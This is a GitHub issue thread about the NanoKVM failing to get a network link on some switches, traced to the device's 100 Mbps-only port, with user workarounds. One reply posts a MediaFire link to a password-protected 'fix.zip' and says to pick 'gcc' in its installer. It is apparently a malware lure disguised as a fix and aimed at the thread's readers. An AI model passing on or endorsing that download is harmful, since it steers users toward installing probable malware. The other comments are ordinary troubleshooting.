sipeed/NanoKVM #21: No link (and no IP) with current batch I got

xbeaudouin, 2024-08-26:
Using 202408020 image (1.2.1).

Upgraded WebUI and tested on a Mikrotik CRS (using SwOS) : works perfectly.
Tried to install this on production on a Juniper EX2300-C-12P Switch with junos 20.2R1.10.
Uppon boot the link just blink one time (just before the OLED screen wakeup) and then... nothing.
I have no error on my switch... nothing bad. Tried to drop down MTU to 1500 on the switch even on unplug / plug the RJ45 : no luck, cannot get IP).

How can I help on my side?
Kind regards

itbear-shu, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

xbeaudouin, 2024-08-26:
No windows here... only mac / freebsd or linux

polyzium, 2024-08-26:
The NanoKVM can only negotiate a 100M connection. Many enterprise grade network switches like Ciscos, Junipers, Huaweis, etc. will not negotiate on 100M, only on 1G+. See https://github.com/sipeed/NanoKVM/issues/7#issuecomment-2299752021 for more information.

Z2Z-GuGu, 2024-09-11:
@xbeaudouin
Our NanoKVM can only negotiate up to 100M, and some switches do not support this speed. You may need to replace other switches. Do you have any other questions, you can raise them here

geerlingguy, 2024-09-17:
Heh, I just ran into this issue on my MikroTik 10G switch CRS309-1G-8S+IN — had to switch to a port on another switch that could negotiate 100 Mbps.

bmanojlovic, 2024-09-18:
I have TP-Link TL-SG108E rather old device that you can force to be 100M full or half duplex but in no case it would start working. It "worked" on newer device Horaco ZX-SWTG124AS and it would negotiate if nothing else partial 10M full which again would drop after some time.
So unfortunately device is 100% not usable.

peaklabs-dev, 2024-10-03:
Will a next batch or different version include a 1G or 2.5G port to fix this issue?

michaelsage, 2024-10-04:
It might not be a solution for everyone, but I ended up getting a "port splitter" from Amazon, it's effectively a two port switch. This is the one I got and it works really well for switches 2.5 or 10 that won't negotiate down [https://amzn.eu/d/1Ns3j9x](url). Hopefully this can be fixed by firmware updates.

xbeaudouin, 2024-10-06:
> @xbeaudouin Our NanoKVM can only negotiate up to 100M, and some switches do not support this speed. You may need to replace other switches. Do you have any other questions, you can raise them here

Well the Juniper EX support 100M (Full duplex ? Half duplex), but maybe the phy of the nano KVM doesn't support all RFCs ?

klaraw3, 2025-04-25:
hi, don`t work with Asus RT-AC87U, Zyxel GS1100-16
they both support 100M

civictd04, 2025-04-26:
Another user said a cat7 or cat8 cable fixed a lot of instability. You can order a 3ft cat8 cable from Amazon for about $6.